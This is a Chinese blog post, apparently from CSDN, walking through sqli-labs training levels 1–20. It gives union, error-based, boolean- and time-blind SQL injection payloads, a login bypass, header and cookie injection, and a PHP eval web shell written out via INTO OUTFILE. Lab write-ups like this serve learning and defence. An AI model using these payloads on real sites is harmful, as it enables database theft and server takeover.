sqli通关记录

最新推荐文章于 2025-03-04 17:44:25 发布
最新推荐文章于 2025-03-04 17:44:25 发布
阅读量169 收藏
点赞数
分类专栏: Web安全 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_39997096/article/details/109721313
版权
本文详细介绍了多种SQL注入攻击方法,包括错误基注入、联合查询、时间基注入和布尔基注入等,涉及单引号、双引号等多种场景。同时,列举了不同类型的报错注入和盲注技巧。文章还提到了应对SQL注入的安全措施,如参数化查询、输入验证和安全配置等。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Less-1 Error Based String

Method 1:union注入

?id= 1' --+

?id=1' and 1=2 union select 1,2,3 --+

?id=1' and 1=2 union select 1,2,database() --+

?id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+

?id=1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+

?id=1' and 1=2 union select 1,2,group_concat(id,':',username,':',password) from users --+
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11

Method 2:xml报错注入

?id=1' and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.columns where table_schema=database()))) --+
  • 1

Less-2 Error Based intiger

去掉单引号,相同

Less-3 Error Based Single quotes with twist

id=1’) 其他相同

Less-4 Error Based Double Quotes String

id=1") 其他相同

Less-5 Double Injection Single Quotes String

Methord 1: Timing注入

?id=1' and sleep(20) --+

?id=1' and if(length(database())>1,sleep(5),1) --+

?id=1' and if(left(database(),1)='s',sleep(5),1) --+

?id=1' and if (left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r',sleep(5),1) --+

?id=1' and if (left((select column_name from information_schema.columns where table_name='users'),1)='a',sleep(5),1) --+

?id=1' and if(left((select passwd from users),1)='s',sleep(5),1) --+
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11

Methord 2:布尔型注入

?id=1' and left((select database()),1)='s'--+

?id=1' and left((select table_name from inforamtion_schema.tables where table_schema=database() limit 0,1),1)='s'--+

?id=1' and left((select column_name from information_schema.columns where table_name='NAME' limit 0,1),1)='s'--+

?id=1' and left((select COLUMN from TABLE limit 0,1 ))='s'--+
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7

Less-6 Double Injection Double Quotes String

?id=1"其他一样

Less-7 Dump into outfile String

?id=1')) and union select 1,2,'<?php @eval($_POST[cmd]);?>' into outfile "Path" --+
  • 1

需要mysql开启secure_file_priv功能

Less-8 Blind Boolian based Single Quotes

?id=1' and 1=2--+

?id=1' and 1=1--+

?id=1' and left((select database()),1)='s'--+

?id=1' and Left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='s'--+
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7

可以使用二分法,’=’ ‘<’ ‘>’

Less-9 Blind Time based Single Quote String

?id=1' and sleep(5)--+

?id=1' and if(length(database())=4,sleep(5),1)--+

?id=1' and if(left((select database()),1)='s',sleep(5),1)--+

?id=1' and if(left((select table_name from information_schema.tables where table_schema=database()),1)='s',sleep(5),1)--+
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7

同样可以使用二分法

Less-10 Blind Time based Double Quotes String

?id=1"其他相同

Less-11 Post Error Based Single quotes String

绕过登录

1' or 1=1#

1' and 1=1#
  • 1
  • 2
  • 3

报错注入

1' and extractvalue(1,concat('~',(select database())))#

1' and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())))#

1' and extractvalue(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='NAME')))#

1‘ and extractvalue(1,concat('~',(select group_concat(COLUMN) from TABLE)))#
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7

union联合查询

1' and 1=2 union select 1,2#

1' and 1=2 union select 1,database()#

1' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

1' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#

1' and 1=2 union select 1,group_concat(id,':',username,':',password) from users#
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9

Less-12 POST Error Based Double quotes String with twist

语句为

$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";
  • 1

"报错为
syntax to use near '""") and password=("") LIMIT 0,1' at line 1

")报错为syntax to use near '") and password=("") LIMIT 0,1' at line 1
因此传入后会自动再括号内增加""

联合注入

") and 1=2 union select 1,database()#

") and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

") and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name="name"#

") and 1=2  union select 1,group_concat("column1",':',"column2") from "table1"#
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7

报错注入

") and extractvalue(1,concat('~',(select database())))#
  • 1

Less-13 Double injection Single quote string with twist

'报错为`syntax to use near ‘’’’) and password=(’’) LIMIT 0,1’ at line 1
没有回显,无法使用union注入

报错注入

') and extractvalue(1, concat('~',(select database())))#
  • 1

Timnig盲注

') or sleep(5)#
  • 1
  • 2

Bool盲注

') or 1=1#
') or 1=2#

') or left((select database()),1)='s'#
  • 1
  • 2
  • 3
  • 4

Less-14 POST Double injection Single quotes String with twist

报错注入

" or extractvalue(1,concat('~',(select database())))#
  • 1

Bool盲注

" or left((select database()),1)='s'#
  • 1

Timing盲注

" or if(left((select database()),1)='s',sleep(5),1)#
  • 1

Less-15 POST Blind Boolian/time Based Single quotes

Less-16 POST Blind Boolian/time Based Single quotes

Bool
Timing

Less-17 POST Update Query Error Based string

对uname存在过滤,过滤转义字符,并对mysql相关符合转义

需要已知uname=admin

报错注入

' and updatexml(1,concat('~',database()),1)#

' and updatexml(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)#

' and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users')),1)#

' and updatexml(1,concat('~',(select id from (select id from users where username='admin') aaa )),1)#

' and updatexml(1,concat(0x7e,(select password from (select password from users where username='admin') mingzi ),0x7e),1)#
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10

Less-18 POST Header injection Uagent field Error based

sql语句为

$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
  • 1

需要对user-agent进行修改

' and extractvalue(1,concat('~',(select database()))) and '
  • 1

需要已知uname=admin,password=admin

Less-19 POST Header injection Referer field Error based

sql语句为

$insert="INSERT INTO `security`.`referers` (`referer`, `ip_address`) VALUES ('$uagent', '$IP')";
  • 1

需要修改Referer

' and extractvalue(1,concat('~',(select database()))) and '

' and extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and '
  • 1
  • 2
  • 3

需要已知uname,password

Less-20 POST Cookie injection Uagent field error based

sql语句为

$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
  • 1

需要修改cookie

' and extractvalue(1, concat('~',(select database())))#

' and extractvalue(1, concat('~',(select group_concat(table_name) from information_schema.tables where table_schema=databse())))#
  • 1
  • 2
  • 3

修改后刷新网页

MySQL数据库SQL注入靶场sqli通关实战(附靶场安装包)
悦分享
10-20 472
SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。带入执行的参数能够可控;拼接的SQL语句能够带入数据库中,并执行;SQL注入攻击是通过操作输入来修改SQL语句,用以达到执行代码对WEB服务器进行攻击的方法。
sqlilabs通关()
Forrest_bear的博客
05-24 2531
就像以下代码一样:隔离空格。
SQLi-LABS Basic Challenges通关记录
qq_40481505的博客
10-14 363
Less-1 Error Based String Method 1:union注入 ?id= 1' --+ ?id=1' and 1=2 union select 1,2,3 --+ ?id=1' and 1=2 union select 1,2,database() --+ ?id=1' and 1=2 union select 1,2,group_concat(table_name) ...
sqli-labs靶场通关
最新发布
cjchsh的博客
03-04 1046
发现url无法回显构造闭合无论' 还是 "都没有任何反应最后发现闭合符号为")时成功登录没有回显使用盲注。
SQL过关
weixin_34174132的博客
07-25 186
引言 做为一个web开发者,不与数据库打交道几乎是不可能的!由此可见,掌握SQL语句对于一个web开发人员来说是多么的重要。下面是我在整理电脑时,找到的资料,觉得还不错就拿出来与大家分享。不废话了,好不好你看了就知道。进入主题,本文的主要内容如下: 问题背景 SQL查询54问? 1、问题背景 本文中的SQL语句都是基于下面几张表的,这也是比较经典的用于数据库教学的数据库例子。 (1)/*员工人...
sqli-labs通关记录
qq_39670065的博客
07-11 2938
sqli-lab通关记录 1.docker搭建 运行:docker info //查看docker信息,确认docker正常 搜索sqli-labs:docker search sqli-labs 建立镜像:docker pull acgpiano/sqli-labs 查看存在的镜像:docker images 运行存在的镜像:docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs (参数解释:-dt 后台运行; --name 命名
sqli-labs通关攻略(全关卡)(更新中~)
C233333235的博客
07-22 1581
7.然后就要进行表名的查询,此处在2的位置用group_concat(table_name),3 from information_schema.tables where table_schema='security'语句进行查询,group_concat的作用是将查询出的表名显示到一行,不然只能显示第一个表名。(别忘了在参数1前面加-,主要是为了使参数变为一个不存在的参数,任何过大的数字或负数,以及小数,科学计数法数字都可以),在这里确定其回显位置为2和3。1.打开关卡,提示我们将参数id填入url中。
sqli-abs靶场通关记录(持续更新中)
宝儿姐的博客
08-11 1349
id=1’ and 1=1–+/#和?id=1’ and 1=2–+/#进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为字符型注入。id=1 and 1=1 和?id=1 and 1=2进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为数字型注入。id=1’order by 3 --+,这里的数字是从小往大了试的,知道出现错误时,那么列数就是前面那一个正常值。1.1判断是否存在sql注入。.
SQL注入:sqli-labs靶场通关(1-5关)
kobelnfn的博客
12-27 1116
我的sqli-labs靶场学习经验分享
sqli靶场通关之less9
sunxueer的博客
07-19 1378
sqli less9 时间盲注 结合burpsuite 1.不返回报错信息页面,无法进行基于报错信息的盲注。2.页面不存在true和false两种不同的页面,无法进行对比也就无法进行布尔盲注。一般来说,在页面没有任何回显和错误信息提示的时候,我们就会测试时间盲注这个手法。 1. 求闭合字符 id=1',1),1'),1"等都试过了,发现始终没有报错信息,猜测正确的输入和错误的输入返回的结果被设置成一样的了 查看源码,证实了猜测,尝试使用时间盲注 id=1 and sleep(5) //未延迟 i
sqli-libs通关详解
hanjinming110的博客
07-24 3019
sql-libs靶场的打靶过程,提供给师傅们一起交流学习!!
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析
热门推荐
Jay17的博客
08-03 4万+
【详细】 Sqli-labs1~65关 通关详解 解题思路+解题步骤+解析 详细,超级详细
SQLI-LABS(Basic Challenges)
volcano的博客
12-04 1101
sql注入 SQL注入是比较常见的网络攻击方式之一,一般分为数字型和字符型,攻击者在HTTP请求中输入含有恶意构造且语法合法的SQL语句,只要应用程序中没有做严格的处理(例如校验或预拼接),那么就会出现SQL注入漏洞危险。 Sqli-labs Sqli-labs-master是一个用来学习sql注入的闯关游戏。 之前看的教程中,普通题目大多数都是用union联合查询注入的,我用的是基于updatexml()函数的报错注入,这里也是参考大佬的博客慢慢学习。 函数解释:   UPDATEXML (XML_doc
sqli-labs 通关上篇(get)
weixin_46877499的博客
08-05 901
1.首先我们输入?id=1,来判断是否存在注入点2.接下来我们判断是字符型还是数字型。数值型不用变,字符型后面加' 或 "4.可以根据回显指定是字符型且存在sql注入漏洞。所以我们可以使用联合查询。
sqli-labs通关攻略
jhfjdf的博客
10-13 1485
sqli-labsless 1 less 1 字符型注入,单引号 网址后面接 ?id=1 正常显示,然后判断注入点 ?id=1' and 1=1--+ 将1=1换成1=2,发现没有报错,但不显示信息,说明可以使用字符注入 之后判断列数,使用order by,从1开始逐渐递增,报错时停止。 ?id=1' order by 1--+ ...
SQL注入:sqli-labs靶场通关(1-37关)
qq_68163788的博客
02-03 2万+
sqli-labs是一个用于学习和练习SQL注入的开源项目。它提供了一系列的实验室环境,让用户能够在不同的SQL注入场景中进行练习和测试。这些场景包括基本的SQL注入、盲注、联合查询注入等等。 sqli-labs还提供了详细的说明和解释,帮助用户理解SQL注入的原理和技术。通过这些实验和学习,用户可以更好地了解SQL注入的危害,并学会如何防范和阻止SQL注入攻击
sql-labs通关讲解
qq_70836100的博客
07-22 1602
目录。
Sqli-labs1~75关 通关详解
2201_75891821的博客
07-22 708
sqli—labs通关攻略
sqlilabs靶场通关详解
01-18
上述脚本展示了如何使用sqlmap批量模式自动探测并导出受影响表内的全部数据记录。 #### POST请求方式下SQL注入实战演练 在面对基于POST提交的数据交互形式时,则需借助Burp Suite这类中间人代理工具先行拦截并修改...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值